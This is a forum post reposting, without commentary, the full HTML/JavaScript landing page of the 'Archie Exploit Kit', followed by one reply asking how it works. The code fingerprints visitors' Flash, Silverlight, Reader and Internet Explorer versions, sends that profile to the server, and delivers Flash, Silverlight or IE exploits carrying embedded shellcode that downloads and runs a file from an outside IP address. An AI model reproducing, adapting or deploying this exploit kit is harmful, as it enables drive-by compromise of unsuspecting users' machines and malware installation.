Nytro Posted September 23, 2014 Report Share Posted September 23, 2014 *** @PhysicalDrive0 *** 2 <html> 3 <head> 4 <script type="text/javascript" src="pluginDet.js"></script> 5 <style type="text/css"> 6 html, body { height: 100%; overflow: auto; } 7 body { padding: 0; margin: 0; } 8 #form1 { height: 99%; } 9 #silverlightControlHost { text-align:center; } 10 </style> 11 <meta http-equiv="X-UA-Compatible" content="IE=edge" /> 12 </head> 13 <body> 14 </body> 15 <script> 16 var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000 8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3"; 17 var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351 5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358"; 18 19 var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA="; 20 21 function spanAppend(val) 22 { 23 var a = document.createElement("span"); 24 document.body.appendChild(a); 25 a.innerHTML = val; 26 } 27 28 function flashLow() 29 { 30 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu e="true" /></object>'); 31 } 32 33 function flashHigh() 34 { 35 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>'); 36 } 37 38 function silverHigh() 39 { 40 spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p ayload3+'" /></object></div></form>'); 41 } 42 43 function fV(val) 44 { 45 return PluginDetect.isMinVersion("Flash", val); 46 } 47 48 function sV(val) 49 { 50 return PluginDetect.isMinVersion("Silverlight", val); 51 } 52 53 function ie(turl) 54 { 55 w = "frameBorder"; 56 r = "width"; 57 q = "iframe"; 58 s = "height"; 59 z = "createElement"; 60 c = "src"; 61 g = '10'; 62 hh = turl; 63 ha = document.createElement(q); 64 ha[w] = '0'; 65 ha[r] = g; 66 ha[s] = g; 67 b = ha[c] = hh; 68 document.body.appendChild(ha); 69 return; 70 } 71 72 function ieVerOk() 73 { 74 t = "test"; 75 try { 76 j = window.navigator.userAgent.toLowerCase(); 77 x = /MSIE[\/\s]\d+/i [t](j); 78 m = /Win64;/i [t](j); 79 z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null; 80 if (!m && x && z && (z == 6 || z == 5 || z == 4)) { 81 return true 82 } 83 } catch (exc) {} 84 return false 85 } 86 87 function ieVer() { 88 t = "test"; 89 try { 90 if (window.msCrypto) 91 return 11; 92 if (window.atob) 93 return 10; 94 if (document.addEventListener) 95 return 9; 96 if (window.JSON && document.querySelector) 97 return 8; 98 if (window.XMLHttpRequest) 99 return 7; 100 } catch (exc) { } 101 return 0 102 } 103 104 function arch() { 105 try 106 { 107 var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); 108 xmlDoc.async = false; 109 xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">'); 110 if (xmlDoc.parseError.errorCode == -2147023083) 111 { 112 return 64; 113 } 114 } 115 catch (ex) 116 { 117 return 0; 118 } 119 return 32; 120 } 121 122 var flashVer = PluginDetect.getVersion("Flash"); 123 var Branch = 0; 124 if (flashVer == "11,0,1,152" 125 || flashVer == "11,1,102,55" || flashVer == "11,1,102,62" 126 || flashVer == "11,1,102,63" || flashVer == "11,2,202,228" 127 || flashVer == "11,2,202,233" || flashVer == "11,2,202,235") 128 Branch = 1; 129 130 131 if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1)) 132 Branch = 2; 133 if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1)) 134 Branch = 2; 135 136 var silverVer = PluginDetect.getVersion("Silverlight"); 137 var silverBranch = 0; 138 if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1) 139 silverBranch = 1; 140 141 142 var adoberVer = PluginDetect.getVersion("AdobeReader"); 143 var adoberBranch = 0; 144 145 var archSys = arch(); 146 var ieVersion = 0; 147 if (archSys != 0) 148 ieVersion = ieVer(); 149 150 var sendstr = ""; 151 sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch); 152 sendstr += encodeURI("&ua=" + window.navigator.userAgent); 153 sendstr += encodeURI("&ref=" + document.referrer); 154 155 if (Branch == 0 && silverBranch == 1) 156 Branch = 3; 157 if (Branch == 0 && archSys != 0) 158 Branch = 4; 159 160 try 161 { 162 var xmlhttp = new XMLHttpRequest(); 163 xmlhttp.open("POST", "/foo", false); 164 xmlhttp.send(sendstr); 165 } 166 catch (exc){} 167 168 169 switch (Branch) 170 { 171 //2014-0497 172 case 1: 173 flashLow(); 174 break; 175 176 //2014-0515 177 case 2: 178 flashHigh(); 179 break; 180 181 case 3: 182 silverHigh(); 183 break; 184 185 case 0: 186 case 4: 187 //var avar = archSys == 32 ? 0 : 1; 188 //ie("/phazar.html?a="+avar); 189 190 ie("/iebasic.html"); 191 break; 192 } 193 194 195 </script> 196 </html>Sursa: Archie Exploit Kit - Pastebin.com Quote Link to comment Share on other sites More sharing options...
blackslikz Posted September 25, 2014 Report Share Posted September 25, 2014 how does this work? Quote Link to comment Share on other sites More sharing options...